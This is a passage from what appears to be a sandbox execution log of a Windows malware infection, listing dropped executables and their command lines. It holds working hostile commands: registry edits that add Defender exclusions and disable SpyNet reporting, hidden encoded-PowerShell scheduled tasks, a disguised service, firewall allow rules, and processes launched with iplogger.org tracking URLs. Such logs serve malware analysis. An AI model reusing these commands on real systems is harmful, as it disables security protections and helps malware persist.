PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 776
3⤵
- Program crash
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 1252
3⤵
- Program crash
PID:5428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 1260
3⤵
- Program crash
PID:5912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "k3ihcWqxTJMAf2JTxRoW0pAX.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\k3ihcWqxTJMAf2JTxRoW0pAX.exe" & exit
3⤵
PID:5944

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "k3ihcWqxTJMAf2JTxRoW0pAX.exe" /f
4⤵
- Kills process with taskkill
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 1440
3⤵
- Program crash
PID:2904

C:\Users\Admin\Pictures\Adobe Films\Soha7tT3rFdzPbjP7tw88TTB.exe
"C:\Users\Admin\Pictures\Adobe Films\Soha7tT3rFdzPbjP7tw88TTB.exe"
2⤵
- Executes dropped EXE
PID:3356

C:\Users\Admin\Pictures\Adobe Films\1gC2vZxQ5rugSU5h48p0XCSL.exe
"C:\Users\Admin\Pictures\Adobe Films\1gC2vZxQ5rugSU5h48p0XCSL.exe"
2⤵
- Executes dropped EXE
PID:3516

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4756

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:1904

C:\Users\Admin\Documents\PourNl4plLr388iWJeA2KQ0W.exe
"C:\Users\Admin\Documents\PourNl4plLr388iWJeA2KQ0W.exe"
3⤵
PID:3964

C:\Users\Admin\Pictures\Adobe Films\MDDDhQ4oPDjQ1woKNSc1QVF9.exe
"C:\Users\Admin\Pictures\Adobe Films\MDDDhQ4oPDjQ1woKNSc1QVF9.exe"
4⤵
PID:5732

C:\Users\Admin\Pictures\Adobe Films\yJ1yaDbnWJUv6XbDedfvbuzn.exe
"C:\Users\Admin\Pictures\Adobe Films\yJ1yaDbnWJUv6XbDedfvbuzn.exe"
4⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 616
5⤵
- Program crash
PID:2648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 636
5⤵
- Program crash
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 656
5⤵
- Program crash
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 664
5⤵
- Program crash
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 892
5⤵
- Program crash
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 828
5⤵
- Program crash
PID:5976

C:\Users\Admin\Pictures\Adobe Films\fYSb1PqeDK1DdFnjtu8NUSbE.exe
"C:\Users\Admin\Pictures\Adobe Films\fYSb1PqeDK1DdFnjtu8NUSbE.exe"
4⤵
PID:4412

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
5⤵
PID:4588

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
6⤵
PID:5860

C:\Users\Admin\Pictures\Adobe Films\7CQ8_YOeqPzM0wiiifsxZACC.exe
"C:\Users\Admin\Pictures\Adobe Films\7CQ8_YOeqPzM0wiiifsxZACC.exe"
4⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\7zS104F.tmp\Install.exe
.\Install.exe
5⤵
PID:2568

C:\Users\Admin\AppData\Local\Temp\7zS2E28.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:5896

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:6064

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:3680

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:3992

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:5956

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:736

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:2952

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:5192

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:3496

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHfVdYOhM" /SC once /ST 07:35:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:1032

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHfVdYOhM"
7⤵
PID:4708

C:\Users\Admin\Pictures\Adobe Films\fCLoR_EzJl7ff6C4YJt5LdBv.exe
"C:\Users\Admin\Pictures\Adobe Films\fCLoR_EzJl7ff6C4YJt5LdBv.exe"
4⤵
PID:3624

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr95662.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr95662.exe"
5⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\AA739.exe
"C:\Users\Admin\AppData\Local\Temp\AA739.exe"
6⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\AA739.exe
"C:\Users\Admin\AppData\Local\Temp\AA739.exe"
6⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\G50HGJM9D81KC0L.exe
https://iplogger.org/1ydBa7
6⤵
PID:4800

C:\Users\Admin\AppData\Local\Temp\G50HG.exe
"C:\Users\Admin\AppData\Local\Temp\G50HG.exe"
6⤵
PID:6052

C:\Users\Admin\AppData\Local\Temp\G50HG.exe
"C:\Users\Admin\AppData\Local\Temp\G50HG.exe"
6⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\AB3AG.exe
"C:\Users\Admin\AppData\Local\Temp\AB3AG.exe"
6⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\BlackCleanerSetp23468.exe
"C:\Users\Admin\AppData\Local\Temp\BlackCleanerSetp23468.exe"
5⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\lijun.exe
"C:\Users\Admin\AppData\Local\Temp\lijun.exe"
5⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\lijun.exe
"C:\Users\Admin\AppData\Local\Temp\lijun.exe" -h
6⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
5⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\tvstream1.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream1.exe"
5⤵
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:5992

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4616

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
5⤵
PID:3756

C:\Users\Admin\AppData\Local\Temp\is-UGN13.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UGN13.tmp\setup.tmp" /SL5="$C01D6,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
7⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\is-F8I8H.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F8I8H.tmp\setup.tmp" /SL5="$9026A,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
8⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"
5⤵
PID:3508

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
5⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
5⤵
PID:4876

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
5⤵
PID:1888

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
5⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:2164

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
5⤵
PID:5528

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\anytime4.exe
"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"
5⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:3980

C:\Users\Admin\AppData\Local\Temp\anytime5.exe
"C:\Users\Admin\AppData\Local\Temp\anytime5.exe"
5⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:2380

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
5⤵
PID:6020

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6020 -s 1688
6⤵
- Program crash
PID:3932

C:\Users\Admin\Pictures\Adobe Films\MtT1mcxH6eO9PgzuN4sOqsOG.exe
"C:\Users\Admin\Pictures\Adobe Films\MtT1mcxH6eO9PgzuN4sOqsOG.exe"
2⤵
- Executes dropped EXE
PID:1888

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
3⤵
PID:4872

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
4⤵
PID:3708

C:\Users\Admin\Pictures\Adobe Films\ItOTVrcrmUZlzEV4QD3hNz3D.exe
"C:\Users\Admin\Pictures\Adobe Films\ItOTVrcrmUZlzEV4QD3hNz3D.exe"
2⤵
- Executes dropped EXE
PID:376

C:\Users\Admin\Pictures\Adobe Films\ItOTVrcrmUZlzEV4QD3hNz3D.exe
"C:\Users\Admin\Pictures\Adobe Films\ItOTVrcrmUZlzEV4QD3hNz3D.exe"
3⤵
PID:4112

C:\Users\Admin\Pictures\Adobe Films\teRY4JR6QjCPYr3w9D9QIMrg.exe
"C:\Users\Admin\Pictures\Adobe Films\teRY4JR6QjCPYr3w9D9QIMrg.exe"
2⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\7zS53E5.tmp\Install.exe
.\Install.exe
3⤵
PID:4520

C:\Users\Admin\AppData\Local\Temp\7zS68D4.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
PID:4924

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gbEkCXmVi" /SC once /ST 03:29:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:5224

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gbEkCXmVi"
5⤵
PID:6112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gbEkCXmVi"
5⤵
PID:5852

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 22:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\rsQmTuw.exe\" j1 /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:5084

C:\Users\Admin\Pictures\Adobe Films\5XxJmsTXlrEXOFYXNu8CSpwY.exe
"C:\Users\Admin\Pictures\Adobe Films\5XxJmsTXlrEXOFYXNu8CSpwY.exe"
2⤵
PID:1788

C:\Users\Admin\Pictures\Adobe Films\bdO_s0qteNmJYXw98Y0RP25H.exe
"C:\Users\Admin\Pictures\Adobe Films\bdO_s0qteNmJYXw98Y0RP25H.exe"
2⤵
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 460
3⤵
- Program crash
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 468
3⤵
- Program crash
PID:4744

C:\Users\Admin\Pictures\Adobe Films\K2vAEH1evc8wjIhwb06gyBuT.exe
"C:\Users\Admin\Pictures\Adobe Films\K2vAEH1evc8wjIhwb06gyBuT.exe"
2⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\Ewugetptipp3.exe
"C:\Users\Admin\AppData\Local\Temp\Ewugetptipp3.exe"
3⤵
PID:4320

C:\Users\Admin\Pictures\Adobe Films\Z3bpbGtkYchSHAAsd2nmWnVg.exe
"C:\Users\Admin\Pictures\Adobe Films\Z3bpbGtkYchSHAAsd2nmWnVg.exe"
2⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\DLGG3.exe
"C:\Users\Admin\AppData\Local\Temp\DLGG3.exe"
3⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\FCB7M.exe
"C:\Users\Admin\AppData\Local\Temp\FCB7M.exe"
3⤵
PID:4644

C:\Users\Admin\AppData\Local\Temp\FCB7M.exe
"C:\Users\Admin\AppData\Local\Temp\FCB7M.exe"
3⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\137LJ2FFFMB46LM.exe
https://iplogger.org/1OUvJ
3⤵
PID:1812

C:\Users\Admin\AppData\Local\Temp\137LJ.exe
"C:\Users\Admin\AppData\Local\Temp\137LJ.exe"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\137LJ.exe
"C:\Users\Admin\AppData\Local\Temp\137LJ.exe"
3⤵
PID:828

C:\Users\Admin\AppData\Local\Temp\FCB7M.exe
"C:\Users\Admin\AppData\Local\Temp\FCB7M.exe"
3⤵
PID:4760

C:\Users\Admin\Pictures\Adobe Films\6iVP9JyeiGV2Ml993RpsflgJ.exe
"C:\Users\Admin\Pictures\Adobe Films\6iVP9JyeiGV2Ml993RpsflgJ.exe"
2⤵
PID:1692

C:\Users\Admin\Pictures\Adobe Films\eSMi4_bdjB0gVKkDAd2lCCKn.exe
"C:\Users\Admin\Pictures\Adobe Films\eSMi4_bdjB0gVKkDAd2lCCKn.exe"
2⤵
PID:3980

C:\Users\Admin\Pictures\Adobe Films\Q9iQATSUpXNLMtxvLYaSm0E5.exe
"C:\Users\Admin\Pictures\Adobe Films\Q9iQATSUpXNLMtxvLYaSm0E5.exe"
2⤵
PID:2848

C:\Users\Admin\Pictures\Adobe Films\Ac3gw11g3tb72SujIU2glzsT.exe
"C:\Users\Admin\Pictures\Adobe Films\Ac3gw11g3tb72SujIU2glzsT.exe"
2⤵
PID:2164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5212

C:\Users\Admin\Pictures\Adobe Films\EU8nHZs9HZQWHCEAtQAgD2dr.exe
"C:\Users\Admin\Pictures\Adobe Films\EU8nHZs9HZQWHCEAtQAgD2dr.exe"
2⤵
PID:2680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 476
3⤵
- Program crash
PID:656

C:\Users\Admin\Pictures\Adobe Films\_zxbKdQL59_JCI1KYbA7t8jS.exe
"C:\Users\Admin\Pictures\Adobe Films\_zxbKdQL59_JCI1KYbA7t8jS.exe"
2⤵
PID:1592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aqnmmtmu\
3⤵
PID:4016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vhqjzzdu.exe" C:\Windows\SysWOW64\aqnmmtmu\
3⤵
PID:1732

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create aqnmmtmu binPath= "C:\Windows\SysWOW64\aqnmmtmu\vhqjzzdu.exe /d\"C:\Users\Admin\Pictures\Adobe Films\_zxbKdQL59_JCI1KYbA7t8jS.exe\"" type= own start= auto DisplayName= "wifi support"
3⤵
PID:4068

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description aqnmmtmu "wifi internet conection"
3⤵
PID:2752

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start aqnmmtmu
3⤵
PID:5160

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
PID:5392

C:\Users\Admin\chcbzdvu.exe
"C:\Users\Admin\chcbzdvu.exe" /d"C:\Users\Admin\Pictures\Adobe Films\_zxbKdQL59_JCI1KYbA7t8jS.exe"
3⤵
PID:5528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rdmfvvzq.exe" C:\Windows\SysWOW64\aqnmmtmu\
4⤵
PID:5668

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config aqnmmtmu binPath= "C:\Windows\SysWOW64\aqnmmtmu\rdmfvvzq.exe /d\"C:\Users\Admin\chcbzdvu.exe\""
4⤵
PID:5952

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start aqnmmtmu
4⤵
PID:6108

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:4528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7715.bat" "
4⤵
PID:5304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 1048
4⤵
- Program crash
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 1056
3⤵
- Program crash
PID:5804

C:\Users\Admin\Pictures\Adobe Films\A1lYHuBPf0Zaut9wQgPnvBv8.exe
"C:\Users\Admin\Pictures\Adobe Films\A1lYHuBPf0Zaut9wQgPnvBv8.exe"
2⤵
PID:3528

C:\Users\Admin\Pictures\Adobe Films\A1lYHuBPf0Zaut9wQgPnvBv8.exe
"C:\Users\Admin\Pictures\Adobe Films\A1lYHuBPf0Zaut9wQgPnvBv8.exe"
3⤵
PID:4240

C:\Users\Admin\Pictures\Adobe Films\54_iwys2aMhanNAv00z7W7kz.exe
"C:\Users\Admin\Pictures\Adobe Films\54_iwys2aMhanNAv00z7W7kz.exe"
2⤵
PID:1752

C:\Users\Admin\Pictures\Adobe Films\hHcLnYPQfBx2k1m2tzAk4hgv.exe
"C:\Users\Admin\Pictures\Adobe Films\hHcLnYPQfBx2k1m2tzAk4hgv.exe"
2⤵
PID:872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 872 -s 472
3⤵
- Program crash
PID:4652

C:\Users\Admin\Pictures\Adobe Films\0kinvWtD4G_rQK0vUEyghqhi.exe
"C:\Users\Admin\Pictures\Adobe Films\0kinvWtD4G_rQK0vUEyghqhi.exe"
2⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
3⤵
PID:4932

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
- Checks processor information in registry
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3568 -ip 3568
1⤵
PID:784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2848 -ip 2848
1⤵
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3980 -ip 3980
1⤵
PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2680 -ip 2680
1⤵
PID:4536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1692 -ip 1692
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2848 -ip 2848
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3980 -ip 3980
1⤵
PID:4740

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1692 -ip 1692
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 872 -s 464
1⤵
- Program crash
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 468
1⤵
- Program crash
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3696 -ip 3696
1⤵
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 872 -ip 872
1⤵
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3472 -ip 3472
1⤵
PID:432

C:\Windows\SysWOW64\cmd.exe
cmd
1⤵
PID:756

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
2⤵
- Enumerates processes with tasklist
PID:5836

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
2⤵
PID:6036

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
2⤵
- Enumerates processes with tasklist
PID:4048

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
2⤵
PID:5984

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
2⤵
PID:5780

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
1⤵
PID:4252

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
2⤵
PID:5252

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
3⤵
PID:5816

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
3⤵
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3472 -ip 3472
1⤵
PID:400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
1⤵
PID:2796

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
2⤵
PID:5424

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5896

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5232

